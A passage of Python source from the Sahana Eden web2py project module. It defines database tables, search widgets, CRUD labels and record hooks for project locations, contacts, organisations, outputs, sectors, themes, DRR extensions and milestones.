label = T("Add Location"),
title=T("Location"),
tooltip=T("Enter some characters to bring up a list of possible matches")),
),
                             # % breakdown by location (stored as a decimal fraction 0..1)
Field("percentage", "decimal(3,2)",
label = T("Percentage"),
default = 0,
requires = IS_DECIMAL_IN_RANGE(0, 1),
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
if community:
LOCATION = T("Community")
LOCATION_TOOLTIP = T("If you don't see the community in the list, you can add a new one by clicking link 'Add Community'.")
ADD_LOCATION = T("Add Community")
crud_strings[tablename] = Storage(
title_create = ADD_LOCATION,
title_display = T("Community Details"),
title_list = T("Communities"),
title_update = T("Edit Community Details"),
title_search = T("Search Communities"),
title_upload = T("Import Community Data"),
title_report = T("3W Report"),
title_map = T("Map of Communities"),
subtitle_create = T("Add New Community"),
label_list_button = T("List Communities"),
label_create_button = ADD_LOCATION,
msg_record_created = T("Community Added"),
msg_record_modified = T("Community Updated"),
msg_record_deleted = T("Community Deleted"),
msg_list_empty = T("No Communities Found")
)
else:
LOCATION = T("Location")
LOCATION_TOOLTIP = T("If you don't see the location in the list, you can add a new one by clicking link 'Add Location'.")
ADD_LOCATION = T("Add Location")
crud_strings[tablename] = Storage(
title_create = ADD_LOCATION,
title_display = T("Location Details"),
title_list = T("Locations"),
title_update = T("Edit Location Details"),
title_search = T("Search Location"),
title_upload = T("Import Location Data"),
title_report = T("3W Report"),
title_map = T("Map of Projects"),
subtitle_create = T("Add New Location"),
label_list_button = T("List Locations"),
label_create_button = ADD_LOCATION,
msg_record_created = T("Location Added"),
msg_record_modified = T("Location updated"),
msg_record_deleted = T("Location Deleted"),
msg_list_empty = T("No Locations Found")
)
# Search Method
if community:
simple = S3SearchSimpleWidget(
name = "project_location_search_text",
label = T("Name"),
comment = T("Search for a Project Community by name."),
field = ["location_id$L0",
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
#"location_id$L5",
]
)
else:
simple = S3SearchSimpleWidget(
name = "project_location_search_text",
label = T("Text"),
comment = T("Search for a Project by name, code, location, or description."),
field = ["location_id$L0",
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
#"location_id$L5",
"project_id$name",
"project_id$code",
"project_id$description",
]
)
advanced_search = [
simple,
# This is only suitable for deployments with a few projects
#S3SearchOptionsWidget(
# name = "project_location_search_project",
# label = T("Project"),
# field = "project_id",
# cols = 3
#),
S3SearchOptionsWidget(
name = "project_location_search_theme",
label = T("Theme"),
field = "project_id$theme_project.theme_id",
options = self.project_theme_opts,
cols = 1,
),
S3SearchOptionsWidget(
name = "project_location_search_L0",
field = "location_id$L0",
label = COUNTRY,
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L1",
field = "location_id$L1",
location_level = "L1",
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L2",
field = "location_id$L2",
location_level = "L2",
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L3",
field = "location_id$L3",
location_level = "L3",
cols = 3
)
]
if settings.get_project_sectors():
sectors = S3SearchOptionsWidget(
name = "project_location_search_sector",
label = T("Sector"),
field = "project_id$sector.name",
cols = 3
)
advanced_search.insert(1, sectors)
search_method = S3Search(
simple = (simple),
advanced = advanced_search,
)
# Resource Configuration
report_fields = [(COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
(messages.ORGANISATION, "project_id$organisation_id"),
(T("Project"), "project_id"),
(T("Activity Types"), "activity_type.activity_type_id"),
]
list_fields = ["location_id",
(COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
"project_id",
]
if settings.get_project_theme_percentages():
list_fields.append((T("Themes"), "project_id$theme_project.theme_id"))
else:
list_fields.append((T("Activity Types"), "activity_type.activity_type_id"))
list_fields.append("comments")
configure(tablename,
super_entity="doc_entity",
create_next=URL(c="project", f="location",
args=["[id]", "beneficiary"]),
deduplicate=self.project_location_deduplicate,
onaccept=self.project_location_onaccept,
search_method=search_method,
report_options=Storage(search = advanced_search,
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(rows="location.location_id$L1",
cols="location.project_id",
fact="activity_type.activity_type_id",
aggregate="list",
totals=True
)
),
list_fields = list_fields,
)
# Reusable Field
project_location_represent = project_LocationRepresent()
project_location_id = S3ReusableField("project_location_id", table,
requires = IS_NULL_OR(
IS_ONE_OF(db(current.auth.s3_accessible_query("update",
table)),
"project_location.id",
project_location_represent,
sort=True)),
represent = project_location_represent,
label = LOCATION,
comment = S3AddResourceLink(ADD_LOCATION,
c="project", f="location",
tooltip=LOCATION_TOOLTIP),
ondelete = "CASCADE"
)
# Components
# Activity Types
add_component("project_activity_type",
project_location=dict(
link="project_activity_type_location",
joinby="project_location_id",
key="activity_type_id",
actuate="hide"))
# Beneficiaries
add_component("project_beneficiary",
project_location="project_location_id")
# Contacts
add_component("pr_person",
project_location=dict(
name="contact",
link="project_location_contact",
joinby="project_location_id",
key="person_id",
actuate="hide",
autodelete=False))
# Distributions
add_component("supply_distribution",
project_location="project_location_id")
# Themes
add_component("project_theme",
project_location=dict(
link="project_theme_location",
joinby="project_location_id",
key="theme_id",
actuate="hide"))
# ---------------------------------------------------------------------
# Project Community Contact Person
#
tablename = "project_location_contact"
table = define_table(tablename,
project_location_id(),
self.pr_person_id(
widget=S3AddPersonWidget(controller="pr"),
requires=IS_ADD_PERSON_WIDGET(),
comment=None
),
*s3_meta_fields())
# CRUD Strings
ADD_CONTACT = T("Add Contact")
LIST_OF_CONTACTS = T("Community Contacts")
crud_strings[tablename] = Storage(
title_create = ADD_CONTACT,
title_display = T("Contact Details"),
title_list = T("Contacts"),
title_update = T("Edit Contact Details"),
title_search = T("Search Contacts"),
subtitle_create = T("Add New Contact"),
label_list_button = T("List Contacts"),
label_create_button = ADD_CONTACT,
msg_record_created = T("Contact Added"),
msg_record_modified = T("Contact Updated"),
msg_record_deleted = T("Contact Deleted"),
msg_list_empty = T("No Contacts Found"))
# Components
# Email
add_component("pr_contact",
project_location_contact=dict(
name="email",
link="pr_person",
joinby="id",
key="pe_id",
fkey="pe_id",
pkey="person_id",
filterby="contact_method",
filterfor=["EMAIL"],
))
# Mobile Phone
add_component("pr_contact",
project_location_contact=dict(
name="phone",
link="pr_person",
joinby="id",
key="pe_id",
fkey="pe_id",
pkey="person_id",
filterby="contact_method",
filterfor=["SMS"],
))
contact_search_method = S3Search(
advanced=(S3SearchSimpleWidget(
name = "location_contact_search_simple",
label = T("Name"),
comment = T("You can search by person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons."),
field = ["person_id$first_name",
"person_id$middle_name",
"person_id$last_name"
]
),
S3SearchOptionsWidget(
name="location_contact_search_L1",
field="project_location_id$location_id$L1",
location_level="L1",
cols = 3,
),
S3SearchOptionsWidget(
name="location_contact_search_L2",
field="project_location_id$location_id$L2",
location_level="L2",
cols = 3,
)
))
# Resource configuration
configure(tablename,
search_method=contact_search_method,
list_fields=["person_id",
(T("Email"), "email.value"),
(T("Mobile Phone"), "phone.value"),
"project_location_id",
(T("Project"), "project_location_id$project_id"),
])
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(project_location_id = project_location_id,
project_location_represent = project_location_represent,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_location_id = lambda **attr: dummy("project_location_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_location_onaccept(form):
"""
Calculate the 'name' field used by Map popups
"""
vars = form.vars
id = vars.id
if vars.location_id and vars.project_id:
name = current.s3db.project_location_represent(None, vars)
elif id:
name = current.s3db.project_location_represent(id)
else:
return None
if len(name) > 512:
# Ensure we don't break limits of SQL field
name = name[:509] + "..."
db = current.db
db(db.project_location.id == id).update(name=name)
# -------------------------------------------------------------------------
@staticmethod
def project_location_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_location":
return
data = item.data
if "project_id" in data and \
"location_id" in data:
project_id = data.project_id
location_id = data.location_id
table = item.table
query = (table.project_id == project_id) & \
(table.location_id == location_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectOrganisationModel(S3Model):
"""
Project Organisation Model
"""
names = ["project_organisation"]
def model(self):
T = current.T
messages = current.messages
NONE = messages["NONE"]
# ---------------------------------------------------------------------
# Project Organisations
# for multi_orgs=True
#
project_organisation_roles = current.deployment_settings.get_project_organisation_roles()
organisation_help = T("Add all organizations which are involved in different roles in this project")
tablename = "project_organisation"
table = self.define_table(tablename,
self.project_project_id(),
self.org_organisation_id(
requires = self.org_organisation_requires(
required=True,
# Need to be able to add Partners/Donors not just Lead org
#updateable=True,
),
widget = None,
comment=S3AddResourceLink(c="org",
f="organisation",
label=T("Add Organization"),
title=messages.ORGANISATION,
tooltip=organisation_help)
),
Field("role", "integer",
label = T("Role"),
requires = IS_NULL_OR(
IS_IN_SET(project_organisation_roles)
),
represent = lambda opt: \
project_organisation_roles.get(opt,
NONE)),
Field("amount", "double",
requires = IS_NULL_OR(
IS_FLOAT_AMOUNT()),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
widget = IS_FLOAT_AMOUNT.widget,
label = T("Funds Contributed")),
s3_currency(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECT_ORG = T("Add Organization to Project")
current.response.s3.crud_strings[tablename] = Storage(
title_create = ADD_PROJECT_ORG,
title_display = T("Project Organization Details"),
title_list = T("Project Organizations"),
title_update = T("Edit Project Organization"),
title_search = T("Search Project Organizations"),
title_upload = T("Import Project Organizations"),
title_report = T("Funding Report"),
subtitle_create = T("Add Organization to Project"),
label_list_button = T("List Project Organizations"),
label_create_button = ADD_PROJECT_ORG,
label_delete_button = T("Remove Organization from Project"),
msg_record_created = T("Organization added to Project"),
msg_record_modified = T("Project Organization updated"),
msg_record_deleted = T("Organization removed from Project"),
msg_list_empty = T("No Organizations for Project(s)"))
# Report Options
report_fields = ["project_id",
"organisation_id",
"role",
"amount",
"currency",
]
report_options = Storage(rows = report_fields,
cols = report_fields,
fact = report_fields,
#methods = ["sum"],
defaults = Storage(rows = "organisation.organisation_id",
cols = "organisation.currency",
fact = "organisation.amount",
aggregate = "sum",
totals = False
)
)
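# Illustrative effect of the defaults above (assumed data): the report
# opens as a funding pivot with organisations as rows, currencies as
# columns and the summed "amount" as the cell value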
# Resource Configuration
self.configure(tablename,
report_options = report_options,
deduplicate=self.project_organisation_deduplicate,
onvalidation=self.project_organisation_onvalidation,
onaccept=self.project_organisation_onaccept,
ondelete=self.project_organisation_ondelete,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_onvalidation(form, lead_role=None):
""" Form validation """
if lead_role is None:
lead_role = current.deployment_settings.get_project_organisation_lead_role()
vars = form.vars
project_id = vars.project_id
organisation_id = vars.organisation_id
if str(vars.role) == str(lead_role) and project_id:
db = current.db
otable = db.project_organisation
query = (otable.deleted != True) & \
(otable.project_id == project_id) & \
(otable.role == lead_role) & \
(otable.organisation_id != organisation_id)
row = db(query).select(otable.id,
limitby=(0, 1)).first()
if row:
form.errors.role = \
current.T("Lead Implementer for this project is already set, please choose another role.")
return
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_onaccept(form):
"""
Record creation post-processing
If the added organisation is the lead role, set the
project.organisation to point to the same organisation
& update the realm_entity.
"""
vars = form.vars
if str(vars.role) == \
str(current.deployment_settings.get_project_organisation_lead_role()):
# Read the record
# (safer than relying on vars which might be missing on component tabs)
db = current.db
ltable = db.project_organisation
record = db(ltable.id == vars.id).select(ltable.project_id,
ltable.organisation_id,
limitby=(0, 1)
).first()
# Set the Project's organisation_id to the new lead organisation
organisation_id = record.organisation_id
ptable = db.project_project
db(ptable.id == record.project_id).update(
organisation_id = organisation_id,
realm_entity = \
current.s3db.pr_get_pe_id("org_organisation",
organisation_id)
)
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_ondelete(row):
"""
Executed when a project organisation record is deleted.
If the deleted organisation had the lead role on this project,
clear the project's organisation_id.
"""
db = current.db
potable = db.project_organisation
ptable = db.project_project
query = (potable.id == row.get("id"))
deleted_row = db(query).select(potable.deleted_fk,
potable.role,
limitby=(0, 1)).first()
if deleted_row and str(deleted_row.role) == \
str(current.deployment_settings.get_project_organisation_lead_role()):
# Get the project_id
deleted_fk = json.loads(deleted_row.deleted_fk)
project_id = deleted_fk["project_id"]
# Set the project organisation_id to NULL (using None)
db(ptable.id == project_id).update(organisation_id=None)
return
# ---------------------------------------------------------------------
@staticmethod
def project_organisation_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_organisation":
return
data = item.data
if "project_id" in data and \
"organisation_id" in data:
table = item.table
project_id = data.project_id
organisation_id = data.organisation_id
query = (table.project_id == project_id) & \
(table.organisation_id == organisation_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectOutputModel(S3Model):
"""
Project Output Model
"""
names = ["project_output"]
def model(self):
T = current.T
db = current.db
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Outputs
#
tablename = "project_output"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("name",
represent = lambda v: v or NONE,
label = T("Output")),
Field("status",
represent = lambda v: v or NONE,
label = T("Status")),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Output"),
title_display = T("Output"),
title_list = T("Outputs"),
title_update = T("Edit Output"),
subtitle_create = T("Add New Output"),
label_list_button = T("List Outputs"),
label_create_button = T("New Output"),
msg_record_created = T("Output added"),
msg_record_modified = T("Output updated"),
msg_record_deleted = T("Output removed"),
msg_list_empty = T("No outputs found")
)
self.configure(tablename,
deduplicate = self.project_output_deduplicate,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_output_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_output":
return
data = item.data
name = data.get("name", None)
project_id = data.get("project_id", None)
if name:
table = item.table
query = (table.name == name)
if project_id:
query &= ((table.project_id == project_id) | \
(table.project_id == None))
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectSectorModel(S3Model):
"""
Project Sector Model
"""
names = ["project_sector_project"]
def model(self):
T = current.T
# ---------------------------------------------------------------------
# Projects <> Sectors Link Table
#
tablename = "project_sector_project"
self.define_table(tablename,
self.org_sector_id(empty=False),
self.project_project_id(empty=False),
*s3_meta_fields()
)
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Sector"),
title_display = T("Sector"),
title_list = T("Sectors"),
title_update = T("Edit Sector"),
title_search = T("Search Sectors"),
title_upload = T("Import Sector data"),
subtitle_create = T("Add New Sector"),
label_list_button = T("List Sectors"),
label_create_button = T("Add Sector to Project"),
msg_record_created = T("Sector added to Project"),
msg_record_modified = T("Sector updated"),
msg_record_deleted = T("Sector removed from Project"),
msg_list_empty = T("No Sectors found for this Project")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectThemeModel(S3Model):
"""
Project Theme Model
"""
names = ["project_theme",
"project_theme_id",
"project_theme_sector",
"project_theme_project",
"project_theme_location",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
theme_percentages = current.deployment_settings.get_project_theme_percentages()
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Themes
#
tablename = "project_theme"
table = define_table(tablename,
Field("name",
length=128,
notnull=True,
unique=True,
label=T("Name"),
represent=lambda v: T(v) if v is not None \
else NONE,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_THEME = T("Add Theme")
crud_strings[tablename] = Storage(
title_create = ADD_THEME,
title_display = T("Theme Details"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
#title_upload = T("Import Themes"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = ADD_THEME,
label_delete_button = T("Delete Theme"),
msg_record_created = T("Theme added"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme deleted"),
msg_list_empty = T("No Themes currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
theme_id = S3ReusableField("theme_id", table,
label = T("Theme"),
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_theme.id",
represent,
sort=True)),
represent = represent,
ondelete = "CASCADE")
# Field settings for the project_theme represent, as used by the
# friendly_string_from_field_query function
# - setting them here breaks Action Buttons, so they are applied inside
# the function which calls them instead
#table.id.represent = represent
#table.id.label = T("Theme")
# Components
add_component("project_theme_project", project_theme="theme_id")
add_component("project_theme_sector", project_theme="theme_id")
# For Sync Filter
add_component("org_sector",
project_theme=Storage(link="project_theme_sector",
joinby="theme_id",
key="sector_id"))
crud_form = S3SQLCustomForm(
"name",
# Project Sectors
S3SQLInlineComponent(
"theme_sector",
label=T("Sectors to which this Theme can apply"),
fields=["sector_id"],
),
"comments"
)
configure(tablename,
crud_form=crud_form,
list_fields=["id",
"name",
(T("Sectors"), "theme_sector.sector_id"),
"comments",
])
# ---------------------------------------------------------------------
# Theme - Sector Link Table
#
tablename = "project_theme_sector"
table = define_table(tablename,
theme_id(empty=False),
self.org_sector_id(label="",
empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Sector"),
title_display = T("Sector"),
title_list = T("Sectors"),
title_update = T("Edit Sector"),
title_search = T("Search Sectors"),
title_upload = T("Import Sector data"),
subtitle_create = T("Add New Sector"),
label_list_button = T("List Sectors"),
label_create_button = T("Add Sector to Theme"),
msg_record_created = T("Sector added to Theme"),
msg_record_modified = T("Sector updated"),
msg_record_deleted = T("Sector removed from Theme"),
msg_list_empty = T("No Sectors found for this Theme")
)
# ---------------------------------------------------------------------
# Theme - Project Link Table
#
tablename = "project_theme_project"
table = define_table(tablename,
theme_id(empty=False),
self.project_project_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
#title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project"),
msg_record_created = T("Theme added to Project"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project"),
msg_list_empty = T("No Themes found for this Project")
)
configure(tablename,
deduplicate=self.project_theme_project_deduplicate,
onaccept = self.project_theme_project_onaccept
)
# ---------------------------------------------------------------------
# Theme - Project Location Link Table
#
tablename = "project_theme_location"
table = define_table(tablename,
theme_id(empty=False),
self.project_location_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project Location"),
msg_record_created = T("Theme added to Project Location"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project Location"),
msg_list_empty = T("No Themes found for this Project Location")
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_onaccept(form):
"""
Record creation post-processing
Update the percentages of all the Project's Locations.
"""
# Check for prepop
project_id = form.vars.get("project_id", None)
if not project_id and form.request_vars:
# Interactive form
project_id = form.request_vars.get("project_id", None)
if not project_id:
return
# Calculate the list of Percentages for this Project
percentages = {}
db = current.db
table = db.project_theme_project
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.theme_id,
table.percentage)
for row in rows:
percentages[row.theme_id] = row.percentage
# Update the Project's Locations
s3db = current.s3db
table = s3db.project_location
ltable = s3db.project_theme_location
update_or_insert = ltable.update_or_insert
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.id)
for row in rows:
for theme_id in percentages:
update_or_insert(project_location_id = row.id,
theme_id = theme_id,
percentage = percentages[theme_id])
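# Illustrative propagation (assumed data): a project themed
# {Health: 60, WASH: 40} gets matching project_theme_location rows
# (via update_or_insert above) for every one of its locations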
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_theme_project":
return
data = item.data
if "project_id" in data and \
"theme_id" in data:
project_id = data.project_id
theme_id = data.theme_id
table = item.table
query = (table.project_id == project_id) & \
(table.theme_id == theme_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectDRRModel(S3Model):
"""
Models for DRR (Disaster Risk Reduction) extensions
"""
names = ["project_drr"]
def model(self):
T = current.T
project_hfa_opts = self.project_hfa_opts()
hfa_opts = dict([(opt, "HFA %s" % opt) for opt in project_hfa_opts])
tablename = "project_drr"
self.define_table(tablename,
self.project_project_id(empty=False),
Field("hfa", "list:integer",
label = T("HFA Priorities"),
requires = IS_NULL_OR(IS_IN_SET(
hfa_opts,
multiple = True)),
widget = S3GroupedOptionsWidget(
cols=1,
help_field=project_hfa_opts
),
represent = S3Represent(options=hfa_opts,
multiple=True),
),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def hfa_opts_represent(opt):
""" Option representation """
if not opt:
return current.messages["NONE"]
if isinstance(opt, int):
opts = [opt]
elif not isinstance(opt, (list, tuple)):
return current.messages["NONE"]
else:
opts = opt
if opts[0] is None:
return current.messages["NONE"]
vals = ["HFA %s" % o for o in opts]
return ", ".join(vals)
# =============================================================================
class S3ProjectDRRPPModel(S3Model):
"""
Models for DRR Project Portal extensions
- injected into custom Project CRUD forms
"""
names = ["project_drrpp"]
def model(self):
T = current.T
db = current.db
NONE = current.messages["NONE"]
local_currencies = current.deployment_settings.get_fin_currencies().keys()
# Remove USD (guarded, in case it is not configured) so that only
# genuinely local currencies remain selectable
if "USD" in local_currencies:
local_currencies.remove("USD")
project_rfa_opts = self.project_rfa_opts()
project_pifacc_opts = self.project_pifacc_opts()
project_jnap_opts = self.project_jnap_opts()
tablename = "project_drrpp"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("parent_project",
represent = lambda v: v or NONE,
label = T("Name of a programme or another project which this project is implemented as part of"),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Parent Project"),
# T("The parent project or programme which this project is implemented under"))),
),
Field("duration", "integer",
represent = lambda v: v or NONE,
label = T("Duration (months)")),
Field("local_budget", "double",
label = T("Total Funding (Local Currency)"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_currency("local_currency",
label = T("Local Currency"),
requires = IS_IN_SET(local_currencies,
zero=None)
),
Field("activities", "text",
represent = lambda v: v or NONE,
label = T("Activities")),
Field("rfa", "list:integer",
label = T("RFA Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_rfa_opts.keys(),
labels = ["RFA %s" % \
rfa for rfa in project_rfa_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "RFA"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_rfa_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("RFA Priorities"),
T("Applicable to projects in Pacific countries only")))),
Field("pifacc", "list:integer",
label = T("PIFACC Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_pifacc_opts.keys(),
labels = ["PIFACC %s" % \
pifacc for pifacc in project_pifacc_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "PIFACC"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_pifacc_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("PIFACC Priorities"),
T("Pacific Islands Framework for Action on Climate Change. Applicable to projects in Pacific countries only")))),
Field("jnap", "list:integer",
label = T("JNAP Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_jnap_opts.keys(),
labels = ["JNAP %s" % \
jnap for jnap in project_jnap_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "JNAP"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_jnap_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("JNAP Priorities"),
T("Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation. Applicable to Cook Islands only")))),
Field("L1", "list:integer",
label = T("Cook Islands"),
requires = IS_NULL_OR(
IS_ONE_OF(db, "gis_location.id",
S3Represent(lookup="gis_location"),
filterby = "L0",
filter_opts = ["Cook Islands"],
not_filterby = "name",
not_filter_opts = ["Cook Islands"],
multiple=True)),
represent = S3Represent(lookup="gis_location",
multiple=True),
widget = lambda f, v, **attr: \
s3_checkboxes_widget(f, v, cols=4, **attr),
),
Field("outputs", "text",
label = "%s (Old - do NOT use)" % T("Outputs"),
represent = lambda v: v or NONE,
readable = False,
writable = False,
),
Field("focal_person",
represent = lambda v: v or NONE,
requires = IS_NOT_EMPTY(),
label = T("Focal Person")),
self.org_organisation_id(label = T("Organization")),
Field("email",
requires=IS_NULL_OR(IS_EMAIL()),
represent = lambda v: v or NONE,
label = T("Email")),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_display = T("DRRPP Extensions"),
title_update = T("Edit DRRPP Extensions"),
)
self.configure(tablename,
onaccept = self.project_drrpp_onaccept,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_drrpp_onaccept(form):
"""
After DB I/O tasks for Project DRRPP records
"""
db = current.db
vars = form.vars
id = vars.id
project_id = vars.project_id
dtable = db.project_drrpp
if not project_id:
# Most reliable way to get the project_id is to read the record
project_id = db(dtable.id == id).select(dtable.project_id,
limitby=(0, 1)
).first().project_id
table = db.project_project
hr_id = db(table.id == project_id).select(table.human_resource_id,
limitby=(0, 1)
).first().human_resource_id
if hr_id:
s3db = current.s3db
htable = db.hrm_human_resource
ctable = s3db.pr_contact
ptable = db.pr_person
query = (htable.id == hr_id) & \
(ptable.id == htable.person_id)
left = ctable.on((ctable.pe_id == ptable.pe_id) & \
(ctable.contact_method == "EMAIL"))
row = db(query).select(htable.organisation_id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
ctable.value,
left=left,
limitby=(0, 1)).first()
focal_person = s3_fullname(row[ptable])
organisation_id = row[htable].organisation_id
email = row[ctable].value
db(dtable.id == id).update(focal_person = focal_person,
organisation_id = organisation_id,
email = email,
)
# -------------------------------------------------------------------------
@staticmethod
def opts_represent(opt, prefix):
""" Option representation """
if isinstance(opt, int):
# Normalise a single value to a list so single ints represent too
opt = [opt]
if isinstance(opt, (list, tuple)):
if not opt or opt[0] is None:
return current.messages["NONE"]
else:
return ", ".join(["%s %s" % (prefix, o) for o in opt])
else:
return current.messages["NONE"]
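# Illustrative usage (assumed values):
# opts_represent([2, 5], "RFA") -> "RFA 2, RFA 5"
# opts_represent(7, "JNAP") -> "JNAP 7"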
# =============================================================================
class S3ProjectTaskModel(S3Model):
"""
Project Task Model
This class holds the tables used for an Organisation to manage
their Tasks in detail.
"""
names = ["project_milestone",
"project_task",
"project_task_id",
"project_time",
"project_comment",
"project_task_project",
"project_task_activity",
"project_task_milestone",
"project_task_represent_w_project",
]
def model(self):
db = current.db
T = current.T
auth = current.auth
request = current.request
project_id = self.project_project_id
messages = current.messages
UNKNOWN_OPT = messages.UNKNOWN_OPT
# Shortcuts
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
super_link = self.super_link
# ---------------------------------------------------------------------
# Project Milestone
#
tablename = "project_milestone"
table = define_table(tablename,
# Stage Report
super_link("doc_id", "doc_entity"),
project_id(),
Field("name",
label = T("Short Description"),
requires=IS_NOT_EMPTY()),
s3_date(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_MILESTONE = T("Add Milestone")
crud_strings[tablename] = Storage(
title_create = ADD_MILESTONE,
title_display = T("Milestone Details"),
title_list = T("Milestones"),
title_update = T("Edit Milestone"),
title_search = T("Search Milestones"),
#title_upload = T("Import Milestones"),
subtitle_create = T("Add New Milestone"),
label_list_button = T("List Milestones"),
label_create_button = ADD_MILESTONE,
msg_record_created = T("Milestone Added"),
msg_record_modified = T("Milestone Updated"),
msg_record_deleted = T("Milestone Deleted"),
msg_list_empty = T("No Milestones Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename,
fields=["name", "date"],
labels="%(name)s: %(date)s",
)
milestone_id = S3ReusableField("milestone_id", table,
sortby="name",
requires = IS_NULL_OR(
